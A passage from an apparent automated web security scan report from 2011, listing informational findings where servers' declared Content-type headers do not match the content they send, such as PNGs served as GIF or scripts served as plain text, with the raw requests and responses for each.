Referer: http://www.gartner.com/technology/contact/contact_gartner.jsp
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WebLogicSession=cSYnN1vJnb1Nx84rkvK9h3y2Z1JSqHc4Q7GnchMG2ZDySdxm2Pns!475228577; WT_FPC=id=173.193.214.243-1722167968.30147392:lv=1303733464197:ss=1303732853510; MKTSESSIONID=2pxxN1kBM49w9XHgl67B0BKnWmRD24ZpTvjK6St3Ncw4TQzX7by2!-1018522061; TS83f541=32d23d3d5a761af07eb8e7078f5d2a8c0621405c7f8621844db564c8

Response

HTTP/1.1 200 OK
Connection: keep-alive
Date: Mon, 25 Apr 2011 12:11:15 GMT
Content-length: 277
Content-type: text/html; charset=ISO-8859-1
Date: Mon, 25 Apr 2011 12:11:15 GMT
X-Powered-By: Servlet/2.4 JSP/2.0
X-PvInfo: [S10203.C10821.A151026.RA0.G24F27.U8B62F8FE].[OT/html.OG/pages]
Vary: Accept-Encoding


var metricsUserClass = "Visitor";
var metricsLoginTxt = "";
var metricsEmailTxt = "";
var metricsCity = "";
var metricsStateCode =
...[SNIP]...
35.89. http://www.google.com/search  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.google.com
Path:   /search

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain unrecognised content.

Request

GET /search?sourceid=chrome&ie=UTF-8&q=Kayako+SupportSuite HTTP/1.1
Host: www.google.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Avail-Dictionary: rU20-FBA
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PREF=ID=0772c9d5ef13aaaf:U=e1fa6a1c985d530f:TM=1303071569:LM=1303430315:S=G3Eo9Ou469J3cHp7; NID=46=G6tAQMMliMdgbUozp0g-12zJ4nIr9W3lVB7VLX4tvICbyeI1deRYnF0ETnjMaFRcDOw858z9ldTQARgCwUuLQTXPs03YWNQDMeYsf58qFzWq4-g9gJ1mhwHeRmKdbRzf

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 19:14:29 GMT
Expires: -1
Cache-Control: private, max-age=0
Content-Type: text/html; charset=UTF-8
Server: gws
X-XSS-Protection: 1; mode=block
Content-Length: 38154

f94-wCe9....S....o...+..D..........O..c<!doctype html> <head> <title>Kayako SupportSuite - Google Search</title> <script>window.google={kEI:"Fci1TbqrKYLa0QHsidHSAg",kEXPI:"17259,24472,25907,27147
...[SNIP]...
35.90. http://www.integritydefender.com/dateTimePicker/anytimejz.js  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.integritydefender.com
Path:   /dateTimePicker/anytimejz.js

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /dateTimePicker/anytimejz.js HTTP/1.1
Host: www.integritydefender.com
Proxy-Connection: keep-alive
Referer: http://www.integritydefender.com/account.php
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=da4c413fd2f41e463cb4aac35dcd5799

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 15:46:00 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Last-Modified: Mon, 10 Jan 2011 13:34:15 GMT
ETag: "41e026d-1243-4997e062723c0"
Accept-Ranges: bytes
Content-Length: 4675
Content-Type: application/javascript


AnyTime.utcLabel = [];
AnyTime.utcLabel[-720]=[
'BIT--Baker Island Time'
];
AnyTime.utcLabel[-660]=[
'SST--Samoa Standard Time'
];
AnyTime.utcLabel[-600]=[
'CKT--Cook Island Time'
,'HAST-
...[SNIP]...
35.91. http://www.internetreputationmanagement.com/sites/all/themes/newtheme/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.internetreputationmanagement.com
Path:   /sites/all/themes/newtheme/favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /sites/all/themes/newtheme/favicon.ico HTTP/1.1
Host: www.internetreputationmanagement.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS66f1c041454c024a385686a578c40a41=ogb51ub0vsr90vi4u3afvog295; has_js=1; __utmz=1.1303746799.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.1986090408.1303746799.1303746799.1303746799.1; __utmc=1; __utmb=1.1.10.1303746799

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 15:53:10 GMT
Server: Apache
Last-Modified: Tue, 08 Feb 2011 22:08:49 GMT
ETag: "25b0272-47e-49bcc97c8de40"
Accept-Ranges: bytes
Content-Length: 1150
Cache-Control: max-age=1209600
Expires: Mon, 09 May 2011 15:53:10 GMT
Connection: close
Content-Type: text/plain

............ .h.......(....... ..... ...................................................................................................................................................................
...[SNIP]...
35.92. http://www.iveco-ptc.spb.ru/images/menu/4d95d099884d7.gif  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.iveco-ptc.spb.ru
Path:   /images/menu/4d95d099884d7.gif

Issue detail

The response contains the following Content-type statement:The response states that it contains a GIF image. However, it actually appears to contain a PNG image.

Request

GET /images/menu/4d95d099884d7.gif HTTP/1.1
Host: www.iveco-ptc.spb.ru
Proxy-Connection: keep-alive
Referer: http://www.iveco-ptc.spb.ru/?_openstat=ZGlyZWN0LnlhbmRleC5ydTszMjIwNzI7NDQzMjM3O3lhbmRleC5ydTpndWFyYW50ZWU
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=00fce441a740fea86b906e1e933c9d1b

Response

HTTP/1.1 200 OK
Server: nginx/1.0.0
Date: Mon, 25 Apr 2011 14:21:27 GMT
Content-Type: image/gif
Connection: keep-alive
Last-Modified: Fri, 01 Apr 2011 13:18:17 GMT
ETag: "205e85-3ab6-49fdb3e329840"
Accept-Ranges: bytes
Content-Length: 15030

.PNG
.
...IHDR...c...V.....T..... .IDATx.t.y.&.U.x..".[s......z.Z.jI ...6K..&!. @.....li0.p.c...3....6.3#d0.6.9.XFR.....VC.KUuUuUf..e~kD.w..?^|......>Y.._D.w........?}.........C..$C.P..............2
...[SNIP]...
35.93. http://www.kayako.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.kayako.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
Host: www.kayako.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: km__last_visit=988416873; __utmz=243534751.1303758892.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=243534751.649237146.1303758892.1303758892.1303758892.1; __utmc=243534751; __utmb=243534751.1.10.1303758892; km__last_activity=1303776914; km__tracker=a%3A0%3A%7B%7D

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 19:46:06 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Fri, 13 Aug 2010 00:44:03 GMT
ETag: "32b0aa5-43e-48da9c781bac0"
Accept-Ranges: bytes
Content-Length: 1086
Connection: close
Content-Type: text/plain; charset=UTF-8

............ .(.......(....... ..... ....................................3...3...3...3...3...3...3...3...3...3...3........B..ZM+..M+..............M+..M+..M+..L+..............M+..A..ZX2".fC5.vTF.......
...[SNIP]...
35.94. http://www.kayako.com/images/hs-graphics/zoomin.cur  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.kayako.com
Path:   /images/hs-graphics/zoomin.cur

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /images/hs-graphics/zoomin.cur HTTP/1.1
Host: www.kayako.com
Proxy-Connection: keep-alive
Referer: http://www.kayako.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: km__last_visit=988416873; km__last_activity=1303776873; km__tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D; __utmz=243534751.1303758892.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=243534751.649237146.1303758892.1303758892.1303758892.1; __utmc=243534751; __utmb=243534751.1.10.1303758892

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 19:43:13 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Tue, 24 Aug 2010 02:04:40 GMT
ETag: "34d137b-146-48e8830119e00"
Accept-Ranges: bytes
Content-Length: 326
Connection: close
Content-Type: text/plain; charset=UTF-8

...... ......0.......(... ...@.............................................................................................p............... ...@.........."..33..$    ..$    ..33..."........................
...[SNIP]...
35.95. http://www.kayako.com/images/hs-graphics/zoomout.cur  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.kayako.com
Path:   /images/hs-graphics/zoomout.cur

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /images/hs-graphics/zoomout.cur HTTP/1.1
Host: www.kayako.com
Proxy-Connection: keep-alive
Referer: http://www.kayako.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: km__last_visit=988416873; km__last_activity=1303776873; km__tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D; __utmz=243534751.1303758892.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=243534751.649237146.1303758892.1303758892.1303758892.1; __utmc=243534751; __utmb=243534751.1.10.1303758892

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 19:45:39 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Tue, 24 Aug 2010 02:04:40 GMT
ETag: "34d137c-146-48e8830119e00"
Accept-Ranges: bytes
Content-Length: 326
Connection: close
Content-Type: text/plain; charset=UTF-8

...... ......0.......(... ...@.............................................................................................p............... ...@.............7...$    ..$    ..7.............................
...[SNIP]...
35.96. http://www.livejournal.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.livejournal.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
Host: www.livejournal.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=164322722.1303741260.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=164322722.814293328.1303741260.1303741260.1303741260.1; __utmc=164322722; __utmb=164322722.1.10.1303741260; ljuniq=yNcQcrN8FpUfQop:1303741249:pgstats0:m0

Response

HTTP/1.1 200 OK
Server: GoatProxy 1.0
Date: Mon, 25 Apr 2011 14:48:47 GMT
Content-Type: text/plain; charset=UTF-8
Connection: close
X-AWS-Id: ws13
Last-Modified: Mon, 15 Dec 2008 21:35:16 GMT
ETag: "4b0e4f-1466-45e1c9e5f8d00"
Content-Length: 5222
X-Varnish: 1971688293 1956434700
Age: 97599
Via: 1.1 varnish

..............(...F...........h...n... .............. ..............(....... ......................................................................................................D.....DDD....D.sD..
...[SNIP]...
35.97. http://www.livejournal.com/tools/endpoints/journalspotlight.bml  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.livejournal.com
Path:   /tools/endpoints/journalspotlight.bml

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain JSON.

Request

GET /tools/endpoints/journalspotlight.bml?skip=1&limit=&show_userpics=1&user=&_rand=0.36380812083370984 HTTP/1.1
Host: www.livejournal.com
Proxy-Connection: keep-alive
Referer: http://www.livejournal.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=164322722.1303741260.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=164322722.814293328.1303741260.1303741260.1303741260.1; __utmc=164322722; __utmb=164322722.1.10.1303741260

Response

HTTP/1.1 200 OK
Server: GoatProxy 1.0
Date: Mon, 25 Apr 2011 14:35:25 GMT
Content-Type: text/html; charset=utf-8
Connection: close
X-AWS-Id: ws15
Set-Cookie: ljuniq=Xw061catQYuvMxT:1303742123:pgstats0:m0; expires=Friday, 24-Jun-2011 14:35:23 GMT; domain=.livejournal.com; path=/
Cache-Control: private, proxy-revalidate
ETag: "768345d85a0645590662a213040f76ec"
Vary: Accept-Encoding
Content-Language: en
X-Varnish: 774812408
Age: 0
Via: 1.1 varnish
Content-Length: 2875

{"text":"<table width='100%'><tr><td valign='top' rowspan='2' style='padding-right: 5px;'>\n<div class='normal-users'>\n<ul class='nostyle pkg'>\n<li class='spotlight-1 with-userpic'><span class='user
...[SNIP]...
35.98. http://www.manageengine.com/images/bandwidth-monitoring.gif  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.manageengine.com
Path:   /images/bandwidth-monitoring.gif

Issue detail

The response contains the following Content-type statement:The response states that it contains a GIF image. However, it actually appears to contain a PNG image.

Request

GET /images/bandwidth-monitoring.gif HTTP/1.1
Host: www.manageengine.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=208542606.1303732848.2.2.utmgclid=CL-9_6TPt6gCFQTe4AodlRiOCw|utmccn=(not%20set)|utmcmd=(not%20set); __utma=208542606.1253035426.1303526945.1303526945.1303732848.2; __utmc=208542606; __utmb=208542606.14.10.1303732848

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 12:15:19 GMT
Server: Apache
Last-Modified: Mon, 18 Jan 2010 13:14:51 GMT
ETag: "aad2-47d70236d08c0"
Accept-Ranges: bytes
Content-Length: 43730
Cache-Control: max-age=2592000
Expires: Wed, 25 May 2011 12:15:19 GMT
Content-Type: image/gif

.PNG
.
...IHDR...g...K........o....PLTE...x.x.....;.........}.}..w........................jik...l..........]........H......r.......................i..........j.............ef.....i......i.........vW
...[SNIP]...
35.99. http://www.manageengine.com/images/ip-sla-voip-monitoring.gif  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.manageengine.com
Path:   /images/ip-sla-voip-monitoring.gif

Issue detail

The response contains the following Content-type statement:The response states that it contains a GIF image. However, it actually appears to contain a PNG image.

Request

GET /images/ip-sla-voip-monitoring.gif HTTP/1.1
Host: www.manageengine.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=208542606.1303732848.2.2.utmgclid=CL-9_6TPt6gCFQTe4AodlRiOCw|utmccn=(not%20set)|utmcmd=(not%20set); __utma=208542606.1253035426.1303526945.1303526945.1303732848.2; __utmc=208542606; __utmb=208542606.14.10.1303732848

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 12:15:20 GMT
Server: Apache
Last-Modified: Mon, 18 Jan 2010 13:14:51 GMT
ETag: "6890-47d70236d08c0"
Accept-Ranges: bytes
Content-Length: 26768
Cache-Control: max-age=2592000
Expires: Wed, 25 May 2011 12:15:20 GMT
Content-Type: image/gif

.PNG
.
...IHDR...r...n.......c.....PLTE.................q.........m.........................._.................................11.......................................(q............................
...[SNIP]...
35.100. http://www.manageengine.com/images/network-configuration-management.gif  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.manageengine.com
Path:   /images/network-configuration-management.gif

Issue detail

The response contains the following Content-type statement:The response states that it contains a GIF image. However, it actually appears to contain a PNG image.

Request

GET /images/network-configuration-management.gif HTTP/1.1
Host: www.manageengine.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=208542606.1303732848.2.2.utmgclid=CL-9_6TPt6gCFQTe4AodlRiOCw|utmccn=(not%20set)|utmcmd=(not%20set); __utma=208542606.1253035426.1303526945.1303526945.1303732848.2; __utmc=208542606; __utmb=208542606.14.10.1303732848

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 12:15:20 GMT
Server: Apache
Last-Modified: Mon, 18 Jan 2010 13:14:51 GMT
ETag: "612b-47d70236d08c0"
Accept-Ranges: bytes
Content-Length: 24875
Cache-Control: max-age=2592000
Expires: Wed, 25 May 2011 12:15:20 GMT
Content-Type: image/gif

.PNG
.
...IHDR.......<.....@G......PLTE.....Q........Ap.6...s.............................Al.......................l...............................................................i..............7...
...[SNIP]...
35.101. http://www.manageengine.com/images/network-health-monitoring.gif  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.manageengine.com
Path:   /images/network-health-monitoring.gif

Issue detail

The response contains the following Content-type statement:The response states that it contains a GIF image. However, it actually appears to contain a PNG image.

Request

GET /images/network-health-monitoring.gif HTTP/1.1
Host: www.manageengine.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=208542606.1303732848.2.2.utmgclid=CL-9_6TPt6gCFQTe4AodlRiOCw|utmccn=(not%20set)|utmcmd=(not%20set); __utma=208542606.1253035426.1303526945.1303526945.1303732848.2; __utmc=208542606; __utmb=208542606.14.10.1303732848

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 12:15:19 GMT
Server: Apache
Last-Modified: Mon, 18 Jan 2010 13:14:51 GMT
ETag: "8aa9-47d70236d08c0"
Accept-Ranges: bytes
Content-Length: 35497
Cache-Control: max-age=2592000
Expires: Wed, 25 May 2011 12:15:19 GMT
Content-Type: image/gif

.PNG
.
...IHDR...D.........    .l....PLTE................--..............................3q.dea.....................q..x........m........Q.Q....m.gi....G.H.....................Jt......l..Rh.m......;..
...[SNIP]...
35.102. http://www.manageengine.com/images/network-mapping.gif  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.manageengine.com
Path:   /images/network-mapping.gif

Issue detail

The response contains the following Content-type statement:The response states that it contains a GIF image. However, it actually appears to contain a PNG image.

Request

GET /images/network-mapping.gif HTTP/1.1
Host: www.manageengine.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=208542606.1303732848.2.2.utmgclid=CL-9_6TPt6gCFQTe4AodlRiOCw|utmccn=(not%20set)|utmcmd=(not%20set); __utma=208542606.1253035426.1303526945.1303526945.1303732848.2; __utmc=208542606; __utmb=208542606.14.10.1303732848

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 12:15:19 GMT
Server: Apache
Last-Modified: Mon, 18 Jan 2010 13:14:51 GMT
ETag: "6a13-47d70236d08c0"
Accept-Ranges: bytes
Content-Length: 27155
Cache-Control: max-age=2592000
Expires: Wed, 25 May 2011 12:15:19 GMT
Content-Type: image/gif

.PNG
.
...IHDR.............a.[.....PLTEk.h..................NNO...........d...^.]......`...............}.|||...jq..l.......rt....kkk..........Y.........&"....M...aaa......sss....................V.iH
...[SNIP]...
35.103. http://www.manageengine.com/images/traffic-analysis.gif  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.manageengine.com
Path:   /images/traffic-analysis.gif

Issue detail

The response contains the following Content-type statement:The response states that it contains a GIF image. However, it actually appears to contain a PNG image.

Request

GET /images/traffic-analysis.gif HTTP/1.1
Host: www.manageengine.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=208542606.1303732848.2.2.utmgclid=CL-9_6TPt6gCFQTe4AodlRiOCw|utmccn=(not%20set)|utmcmd=(not%20set); __utma=208542606.1253035426.1303526945.1303526945.1303732848.2; __utmc=208542606; __utmb=208542606.14.10.1303732848

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 12:15:19 GMT
Server: Apache
Last-Modified: Mon, 18 Jan 2010 13:14:51 GMT
ETag: "68df-47d70236d08c0"
Accept-Ranges: bytes
Content-Length: 26847
Cache-Control: max-age=2592000
Expires: Wed, 25 May 2011 12:15:19 GMT
Content-Type: image/gif

.PNG
.
...IHDR...?.........h`.{....PLTE..................u....Y.......pX...Ej.........................kk.#U..................K.....................}}|..............f...X....m........................
...[SNIP]...
35.104. http://www.manageengine.com/images/wan-monitoring.gif  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.manageengine.com
Path:   /images/wan-monitoring.gif

Issue detail

The response contains the following Content-type statement:The response states that it contains a GIF image. However, it actually appears to contain a PNG image.

Request

GET /images/wan-monitoring.gif HTTP/1.1
Host: www.manageengine.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=208542606.1303732848.2.2.utmgclid=CL-9_6TPt6gCFQTe4AodlRiOCw|utmccn=(not%20set)|utmcmd=(not%20set); __utma=208542606.1253035426.1303526945.1303526945.1303732848.2; __utmc=208542606; __utmb=208542606.14.10.1303732848

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 12:15:19 GMT
Server: Apache
Last-Modified: Mon, 18 Jan 2010 13:14:51 GMT
ETag: "8252-47d70236d08c0"
Accept-Ranges: bytes
Content-Length: 33362
Cache-Control: max-age=2592000
Expires: Wed, 25 May 2011 12:15:19 GMT
Content-Type: image/gif

.PNG
.
...IHDR.......=.....w8K@....PLTEp.............cg..\l...............k......f..........................Z...........q.q..a..........................................r.'......mrr7pI......F.R......
...[SNIP]...
35.105. http://www.netsuite.com/portal/javascript/effects.js  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.netsuite.com
Path:   /portal/javascript/effects.js

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain script.

Request

GET /portal/javascript/effects.js HTTP/1.1
Host: www.netsuite.com
Proxy-Connection: keep-alive
Referer: http://www.netsuite.com/portal/products/ecommerce/website-hosting.shtml
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NS_VER=2011.1.0; __utmz=1.1303742452.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); JSESSIONID=k23zN1HJzNw2PWHTMzr6q1LqT1Q41y9Tz2M0V9JvpTH0mJ5TfxDLbGQpDm2qpc2ThmqSMyK39KWhLDnCtK6fYxHWtxqSfGGZGG53PyJw5wXyXYk1y7kppJz4hQqHll7q!-577847599; NLVisitorId=rcHW8495Af7oGhFy; NLShopperId=rcHW8495AQLpGtOI; bn_u=6923519460848807096; __utma=1.1781939456.1303742452.1303742452.1303742452.1; __utmc=1; __utmb=1.5.10.1303742452; mbox=session#1303736347554-914602#1303745022|PC#1303736347554-914602.17#1304952762|check#true#1303743222; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.netsuite.com%2Fportal%2Fpage_not_found.shtml%22%2C%22r%22%3A%22http%3A%2F%2Fwww.netsuite.com%2Fpages%2Fportal%2Fpage_not_found.jspinternal%3DT%22%2C%22t%22%3A1303743275975%2C%22u%22%3A%226923519460848807096%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.netsuite.com%2Fportal%2Fproducts%2Fecommerce%2Fwebsite-hosting.shtml%22%2C%22l%22%3A%22Ecommerce%20-%20SEO%22%2C%22de%22%3A%7B%22su%22%3A%22NetSuite%20for%20mid-sized%20businesses%20adds%20advanced%20accounting%2C%20customer%20relationship%20management%2C%20and%20SFA%20to%20the%20NetSuite%20family.%20Includes%3A%20NetSuite%20Accounting%2C%20NetSuite%20CRM%2C%20NetSuite%20SFA%2C%20NetSuite%20Knowledge%20Base%2C%20and%20NetSuite%20Vendor%20Center.%22%2C%22ti%22%3A%22NetSuite%20%7C%20Form%22%2C%22nw%22%3A173%2C%22nl%22%3A46%7D%7D

Response

HTTP/1.1 200 OK
Server: Apache
Content-Disposition: inline;filename*=utf-8''effects.js
NS_RTIMER_COMPOSITE: 1564836203:73686F702D6A6176613030342E7376616C652E6E65746C65646765722E636F6D:80
NLCacheNote: FromMediaCache=T
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Content-Type: text/plain; charset=UTF-8
Cache-Control: max-age=2976
Date: Mon, 25 Apr 2011 14:54:25 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 38227

// script.aculo.us effects.js v1.7.1_beta2, Sat Apr 28 15:20:12 CEST 2007

// Copyright (c) 2005-2007 Thomas Fuchs (http://script.aculo.us, http://mir.aculo.us)
// Contributors:
// Justin Palmer (htt
...[SNIP]...
35.106. http://www.netsuite.com/portal/javascript/prototype.js  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.netsuite.com
Path:   /portal/javascript/prototype.js

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain script.

Request

GET /portal/javascript/prototype.js HTTP/1.1
Host: www.netsuite.com
Proxy-Connection: keep-alive
Referer: http://www.netsuite.com/portal/products/ecommerce/website-hosting.shtml
